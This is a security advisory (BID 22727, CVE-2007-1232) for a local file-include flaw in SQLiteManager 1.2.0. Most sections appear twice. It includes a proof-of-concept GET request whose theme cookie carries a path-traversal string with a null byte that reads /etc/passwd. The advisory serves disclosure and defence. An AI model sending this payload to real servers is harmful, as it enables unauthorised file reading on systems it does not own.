SQLiteManager Local File Include Vulnerability
BID:22727
Info
SQLiteManager Local File Include Vulnerability
| Bugtraq ID: | 22727 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1232 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 26 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | Simon Bonnard is credited with the discovery of this vulnerability. |
| Vulnerable: |
SQLiteManager SQLiteManager 1.2 |
| Not Vulnerable: | |
Discussion
SQLiteManager Local File Include Vulnerability
SQLiteManager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
SQLiteManager 1.2.0 is vulnerable to this issue; other versions may also be affected.
SQLiteManager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
SQLiteManager 1.2.0 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
SQLiteManager Local File Include Vulnerability
Attackers can exploit this issue via a web client.
The following example GET request is available:
GET /home/sqlite/ HTTP/1.0
[...]
Cookie: PHPSESSID=[...];SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00;
SQLiteManager_currentLangue=deleted
Attackers can exploit this issue via a web client.
The following example GET request is available:
GET /home/sqlite/ HTTP/1.0
[...]
Cookie: PHPSESSID=[...];SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00;
SQLiteManager_currentLangue=deleted
Solution / Fix
SQLiteManager Local File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
SQLiteManager Local File Include Vulnerability
References:
References:
- Vendor Homepage (SQLiteManager)
- SQLiteManager v1.2.0 Multiple Vulnerabilities (Simon Bonnard)